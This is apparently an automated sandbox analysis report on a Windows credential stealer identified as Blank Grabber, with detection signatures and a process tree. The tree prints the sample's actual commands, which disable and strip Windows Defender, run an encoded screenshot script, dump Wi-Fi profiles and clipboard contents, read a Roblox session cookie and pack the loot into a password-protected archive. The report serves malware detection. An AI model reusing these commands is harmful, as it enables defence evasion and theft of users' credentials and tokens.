Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9g9LZNE4bH.exe

Overview

General Information

Sample name:9g9LZNE4bH.exe
renamed because original name is a hash value
Original sample name:fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
Analysis ID:1584119
MD5:03bb5937fb7b74837da488b2278d0811
SHA1:51259fa1bf7608d3c394c2f7776f581d5251aa01
SHA256:fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29
Tags:exeuser-zhuzhu0009
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • 9g9LZNE4bH.exe (PID: 6176 cmdline: "C:\Users\user\Desktop\9g9LZNE4bH.exe" MD5: 03BB5937FB7B74837DA488B2278D0811)
    • 9g9LZNE4bH.exe (PID: 5860 cmdline: "C:\Users\user\Desktop\9g9LZNE4bH.exe" MD5: 03BB5937FB7B74837DA488B2278D0811)
      • cmd.exe (PID: 1868 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5024 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5988 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5440 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 7868 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 3712 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3840 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7224 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7428 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7240 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7388 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7488 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7860 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7504 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7764 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7512 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7784 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7564 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7772 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7580 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 7880 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 8076 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 1576 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 8088 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5704 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 7632 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 7292 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF89E.tmp" "c:\Users\user\AppData\Local\Temp\3lfchnc2\CSC30375EB9C2504D3B856F38EEC7AAE920.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 8096 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 412 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7620 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7924 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7760 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 7956 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 7564 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7668 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7664 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7492 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7648 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 1272 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 2820 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8116 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7856 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7444 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7312 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 7360 cmdline: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 7792 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7716 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7892 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
